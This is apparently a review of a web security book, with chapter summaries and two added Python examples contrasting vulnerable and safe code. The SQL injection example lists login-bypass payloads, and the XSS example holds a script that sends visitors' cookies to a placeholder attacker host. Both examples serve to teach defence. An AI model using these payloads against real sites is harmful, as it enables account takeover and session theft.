General Overview
The book is about 250 pages long and consists of 10 chapters. It contains many code snippets and images. The reading difficulty level is light/medium.
Short Description
Let’s briefly review the book’s chapters.
Chapter 1. Fundamentals of Security.
Security fundamentals are briefly covered — from social engineering to DDoS attacks.
Chapter 2. Simple Hacking Methods.
Examples of building a properly protected online voting (poll) feature are presented, including the use of CAPTCHA to stop automated repeat votes.
Chapter 3. Hacking PHP Scripts.
Ways to attack PHP scripts through the URL parameters they receive and process on the server are discussed, along with other methods.
Chapter 4. Working with System Commands.
System command calls are explained. The topic of working with files (e.g., uploading to a server) is also touched upon.
Chapter 5. SQL Injection (PHP + MySQL).
SQL injection through URL parameters and form fields whose values are poorly filtered and processed on the server is examined.
Chapter 6. SQL Injection (.NET + MS SQL Server).
Essentially the same material, applied to C# and MS SQL Server.
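As an added illustration for chapters 5 and 6 (this is not code from the book): the injection the chapters describe, in miniature. Python with the standard-library sqlite3 module stands in for PHP + MySQL or C# + MS SQL Server; the users table, the credentials and both payloads are constructed here. The vulnerable function mirrors the string-interpolated query pattern the book attacks, and the safe one shows the parameterised query that defeats it.

```python
import sqlite3


# Constructed sample database standing in for the book's PHP + MySQL setup.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "wonderland")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string interpolation, as in the classic
    "SELECT ... WHERE username='$u' AND password='$p'" PHP pattern.
    Returns the matched username, or None."""
    query = (
        "SELECT username FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with a parameterised query: the driver sends the values
    separately from the SQL text, so quotes in the input cannot change the
    statement's structure."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Two constructed payloads of the kind the chapters discuss.
# "-- " closes the quoted string and comments out the rest of the line;
# MySQL requires the space after "--", SQLite accepts it either way.
COMMENT_OUT = "admin' -- "
# Turns the WHERE clause into a tautology; AND binds tighter than OR,
# so every row matches and the first one (admin) is returned.
ALWAYS_TRUE = "x' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, COMMENT_OUT, "anything"))  # admin: no password needed
    print(login_vulnerable(db, "nobody", ALWAYS_TRUE))    # admin: first row wins
    print(login_safe(db, COMMENT_OUT, "anything"))        # None
    print(login_safe(db, "nobody", ALWAYS_TRUE))          # None
    print(login_safe(db, "admin", "s3cret"))              # admin
```

The point to take from the two functions is that filtering quotes is not the fix; separating data from SQL text is. The same parameterisation exists in PHP (PDO or mysqli prepared statements) and in .NET (SqlCommand parameters).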
Chapter 7. CSRF, or XSRF Vulnerability.
The title speaks for itself: cross-site request forgery attacks and ways to defend against them are examined.
Chapter 8. DoS Attack on a Website.
Denial-of-service attacks, including distributed ones (DDoS), aimed at exhausting server resources are described. Examples of weak points in web applications and servers are analyzed.
Chapter 9. Authorization.
Various simple authorization methods — from cookies to sessions — are examined, and the weaknesses of each approach are described.
Chapter 10. XSS.
It covers cross-site scripting: injecting JavaScript into a page so that visitors' data (cookies, for example) can be stolen.
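As an added illustration for chapter 10 (not code from the book): how a stored comment turns into cookie theft when it is echoed into the page unescaped, and how output escaping for the right context stops it. The payload, the "attacker.invalid" placeholder host (a reserved .invalid name) and the rendering functions are all constructed here; Python's standard html module does the escaping.

```python
import html

# Constructed attacker comment of the kind the chapter discusses: if the
# browser executes it, the visitor's cookie is sent to the attacker's host.
PAYLOAD = (
    "<script>new Image().src="
    "'http://attacker.invalid/?c='+document.cookie</script>"
)


def render_comment_vulnerable(text):
    """Inserts user text straight into the page body, as a naive
    'echo $_GET["comment"]' in PHP would. Any markup in the text runs."""
    return '<p class="comment">%s</p>' % text


def render_comment_safe(text):
    """HTML-escapes the text for the element-body context, so the browser
    displays the payload as literal characters instead of executing it."""
    return '<p class="comment">%s</p>' % html.escape(text, quote=True)


def render_attr_safe(text):
    """Attribute context: the value is quoted and escaped with quote=True,
    which also turns ' and " into entities, so the input cannot break out
    of the attribute and add an event handler."""
    return '<input type="text" name="comment" value="%s">' % html.escape(
        text, quote=True
    )


def has_active_script(page):
    """Crude check: does the emitted HTML still contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(has_active_script(render_comment_vulnerable(PAYLOAD)))  # True
    print(has_active_script(render_comment_safe(PAYLOAD)))        # False
    print(render_comment_safe(PAYLOAD))
    print(render_attr_safe('" onfocus="alert(1)'))
```

Two caveats a practitioner would add: escaping is context-specific (element body, attribute, URL and inline JavaScript each need their own encoding, and html.escape only covers the first two), and marking session cookies HttpOnly keeps document.cookie from exposing them even when an injection does get through.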
Opinion
By this point I had already read a dozen books on security and ways to attack and protect web servers and sites. With each new book the amount of new useful information for me dwindles, as the topics are the same, often treated superficially, and few people want to dive deeper and write detailed books on specific aspects.
Nevertheless, this book periodically fed me new information, and after finishing it I ended up with a 15‑page summary. That speaks to the book’s value even for me.
More broadly, without tying it to me personally, if you want to delve into information‑security topics and are not yet an expert, I definitely recommend this book for reading.
This text is exclusively a review of the book and is not a recommendation. The tools and methods described in the book are presented solely for informational purposes — this does not constitute a call to action on my part. Moreover, some technologies or practices may be restricted, blocked, or illegal in certain countries, and each individual should evaluate their use independently, considering local legislation and personal responsibility.